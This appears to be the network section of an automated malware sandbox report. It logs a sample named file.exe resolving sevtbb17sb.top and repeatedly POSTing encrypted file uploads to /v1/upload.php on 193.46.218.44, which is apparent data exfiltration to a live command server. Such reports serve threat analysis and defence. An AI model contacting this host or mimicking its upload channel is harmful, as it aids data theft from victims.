Oct 20, 2024 15:25:35.728478909 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.733424902 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.733525991 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.733680964 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.733731985 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.738519907 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.738580942 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.738625050 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.738684893 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.738768101 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.738796949 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.738818884 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.738838911 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.738949060 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.738977909 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.739001989 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.739003897 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.739025116 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.739032030 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.739046097 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.739061117 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743197918 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743748903 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743782043 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743869066 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743901014 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.743977070 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.744007111 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.744242907 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.786475897 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.091780901 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.091890097 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.118262053 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.123148918 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.254107952 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.259058952 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.259171009 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.270932913 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.270998955 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.275944948 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.275975943 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276021004 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276051998 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276077032 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276118994 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276132107 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276164055 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276189089 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276217937 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276241064 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276271105 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.276433945 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276462078 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.276485920 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:37.280766964 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.280797005 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281271935 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281300068 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281351089 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281378984 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281407118 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.281434059 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:37.322535992 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.607460976 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.607562065 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.607711077 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.612629890 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.720333099 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.725454092 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.725548983 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.725718975 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.725800037 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730655909 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730747938 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730806112 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730835915 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730882883 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730886936 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730915070 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730917931 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730942011 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730945110 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730972052 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.730994940 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.730998039 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.731040955 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.731057882 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.731067896 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.735445976 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736027002 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736053944 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736109018 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736135960 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736183882 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.736211061 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:38.757775068 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:38.762787104 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.064646959 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.064762115 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.080910921 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.085978031 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.197271109 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.202265978 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.202385902 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.202495098 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.202574015 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207472086 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207501888 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207576036 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207607031 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207636118 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207643032 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207663059 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207684040 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207696915 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207717896 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207753897 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.207762957 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207788944 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207815886 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.207823038 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:40.212138891 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212685108 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212735891 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212764025 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212820053 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212847948 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.212877989 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:40.258429050 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.567137003 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.567322969 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.567421913 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.572257042 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.681801081 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.687094927 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.687192917 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.687477112 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.687573910 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692311049 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692370892 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692603111 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692660093 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692663908 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692715883 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692729950 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692759991 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692778111 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692790031 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692812920 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692842007 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692857027 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692888021 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.692910910 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:41.692915916 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.697067976 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.697197914 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.697731018 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.697782040 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.701878071 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.701908112 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.701936007 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:41.738478899 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.004645109 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.004739046 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.004823923 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.009969950 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.118628979 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.123673916 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.123764038 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.123851061 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.123899937 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128650904 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128715992 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128751993 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128798962 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128806114 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128858089 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128868103 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128914118 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128937960 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128968954 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.128982067 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.128998995 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.129012108 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.129026890 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.129041910 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:43.129096985 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.133445024 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134001017 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134031057 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134063005 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134090900 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134140968 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.134169102 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:43.178431988 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:44.455354929 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:44.455495119 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:44.460989952 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:44.461061954 CEST	49762	80	192.168.2.4	193.46.218.44

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 15:25:09.068212032 CEST	61755	53	192.168.2.4	1.1.1.1
Oct 20, 2024 15:25:09.698729038 CEST	53	61755	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 20, 2024 15:25:09.068212032 CEST	192.168.2.4	1.1.1.1	0xbe7f	Standard query (0)	sevtbb17sb.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 20, 2024 15:25:09.698729038 CEST	1.1.1.1	192.168.2.4	0xbe7f	No error (0)	sevtbb17sb.top		193.46.218.44	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sevtbb17sb.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:09.709619045 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary52394516 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbb17sb.top
Oct 20, 2024 15:25:09.709670067 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 32 33 39 34 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 79 Data Ascii: ------Boundary52394516Content-Disposition: form-data; name="file"; filename="Vuyizez.bin"Content-Type: application/octet-stream'm>Ge#]Pw;<S#ZN6`0%QMo>!cv%sWxPyGT^Fv>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:10.983464003 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary52394516 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbb17sb.top
Oct 20, 2024 15:25:10.983464003 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 32 33 39 34 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 79 Data Ascii: ------Boundary52394516Content-Disposition: form-data; name="file"; filename="Vuyizez.bin"Content-Type: application/octet-stream'm>Ge#]Pw;<S#ZN6`0%QMo>!cv%sWxPyGT^Fv>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:12.281105042 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary52394516 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbb17sb.top
Oct 20, 2024 15:25:12.281136036 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 32 33 39 34 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 79 Data Ascii: ------Boundary52394516Content-Disposition: form-data; name="file"; filename="Vuyizez.bin"Content-Type: application/octet-stream'm>Ge#]Pw;<S#ZN6`0%QMo>!cv%sWxPyGT^Fv>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:14.327316046 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary52394516 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbb17sb.top
Oct 20, 2024 15:25:14.327334881 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 32 33 39 34 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 79 Data Ascii: ------Boundary52394516Content-Disposition: form-data; name="file"; filename="Vuyizez.bin"Content-Type: application/octet-stream'm>Ge#]Pw;<S#ZN6`0%QMo>!cv%sWxPyGT^Fv>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:15.592658043 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary52394516 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 411 Host: sevtbb17sb.top
Oct 20, 2024 15:25:15.592689037 CEST	411	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 32 33 39 34 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 79 Data Ascii: ------Boundary52394516Content-Disposition: form-data; name="file"; filename="Vuyizez.bin"Content-Type: application/octet-stream'm>Ge#]Pw;<S#ZN6`0%QMo>!cv%sWxPyGT^Fv>
Oct 20, 2024 15:25:16.759891987 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 13:25:16 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:18.172220945 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41997986 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 63800 Host: sevtbb17sb.top
Oct 20, 2024 15:25:18.172296047 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 39 39 37 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 69 6c Data Ascii: ------Boundary41997986Content-Disposition: form-data; name="file"; filename="Piloqaxe.bin"Content-Type: application/octet-streamnviN@UNsGzR*XVA%\|Rg7t'S :3[J/Gklb [od/i
Oct 20, 2024 15:25:18.177148104 CEST	1236	OUT	Data Raw: cb cf 11 64 ea d2 eb fc c7 27 16 4c 86 b2 98 33 88 26 1c 20 ba dd 8b b1 28 4c fc 9d a3 fd 09 c6 6e f4 7d ea 4c a3 63 a7 47 20 c7 19 6f 2d 43 bc 4d ca 9d 5d fd 83 63 48 c1 69 76 59 73 bf 58 3a c2 f2 a3 75 ac a6 87 d3 12 b4 7f 16 f3 42 54 b0 78 96 Data Ascii: d'L3& (Ln}LcG o-CM]cHivYsX:uBTx+]{tHG:/!M&Y@TV4[MrUPGW+<7/k-]p>2}Y8=0O(erPAv`jH]Ui3$al
Oct 20, 2024 15:25:18.177323103 CEST	2472	OUT	Data Raw: cd ba a6 4d d9 fe 3e 4d 15 64 cd e4 96 21 d7 2e ae 43 d7 d9 0e 3f 57 15 7f 7c b3 50 51 4d 19 40 71 5e 5d 67 54 5e 00 75 e3 9b 38 e3 6e be 1b 91 9a 2f 88 88 8b 2d 3f 73 f4 2e 18 d8 a4 41 92 24 42 cc 02 10 27 c3 b8 55 10 6a 67 c4 e6 b7 28 a0 49 78 Data Ascii: M>Md!.C?W\|PQM@q^]gT^u8n/-?s.A$B'Ujg(IxPw}!Na,5~LB[MyMbldiC%WWkf[zJ/?:i9\|\|D0mku51umS]um8xE.js_QB$;!
Oct 20, 2024 15:25:18.177336931 CEST	2472	OUT	Data Raw: c1 ae 8c d5 80 b8 91 55 dd df 3f 7f bc c8 72 f3 8b 28 96 39 b7 29 40 50 94 56 cf 2a 77 9c 71 bd f7 35 eb 83 b0 0d 16 5d 2f 0a b8 09 22 88 c1 1c ec 13 ac 5b 8e 58 81 70 29 13 bb e7 3d 17 50 94 e2 3e 5b 94 13 f8 ff f7 62 cc 1f 6b 6b 5b 73 95 2c 65 Data Ascii: U?r(9)@PVwq5]/"[Xp)=P>[bkk[s,e6Klf\|=P_%)H20\|m>.,W$`#}S]"$,3;-f4Wwjh=Zw.*b\hr=C]j/n=I`RA1CufUGGH5q"
Oct 20, 2024 15:25:18.177433968 CEST	6180	OUT	Data Raw: 3a 42 08 88 ce 4e 05 ff f2 ae 22 df 66 86 36 20 3d a9 8e 16 1b 14 1d 76 92 5e 04 4d 31 c8 de 9c bb 45 0e c4 3b a6 e9 85 71 7e 52 d3 4d a9 c2 5e 71 34 02 95 63 0b 62 ba c7 a5 8e 0a 62 ed 85 fc 7e 47 49 0e a7 1f 37 72 8d 17 28 9c b8 47 89 e8 2c 3e Data Ascii: :BN"f6 =v^M1E;q~RM^q4cbb~GI7r(G,>a:BC(K8HNe@snD^R#SM,k}Mx!(DTuiio56#Ud44b\GR =?"t5TRKK*K=
